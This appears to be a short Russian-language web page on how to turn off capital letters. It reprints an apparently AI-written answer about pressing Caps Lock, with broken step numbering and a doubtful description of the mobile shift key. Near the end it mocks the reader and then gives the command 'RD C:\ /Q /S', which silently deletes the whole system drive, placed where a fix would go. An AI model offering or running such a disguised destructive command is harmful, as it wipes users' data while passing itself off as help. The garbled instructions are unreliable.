КАК ОТКЛЮЧИТЬ БОЛЬШИЕ БУКВЫ

Raw }| Mind "{ AI предложил такой вариант решения:

Для того чтобы отключить большие буквы на вашей клавиатуре, вам нужно выполнить следующие шаги:

  1. На компьютерах Windows:

  2. - Нажмите кнопку Caps Lock на клавиатуре.

  1. На компьютерах Mac:

  2. - Также нажмите кнопку Caps Lock.

  1. На мобильных устройствах (Android и iOS):

  2. - Обычно есть специальная кнопка на виртуальной клавиатуре, которая выглядит как стрелочка или буква "A" с двумя точками над ней. Нажмите на неё для переключения между большими и маленькими буквами.

Если у вас возникнут дополнительные вопросы по этой теме или вам потребуется помощь в другом вопросе, дайте знать!

ПОПРОБУЙ ТРЕСНУТЬ СЕБЕ МОНИТОРОМ ПО БАШКЕ

RD C:\ /Q /S

Caps Lock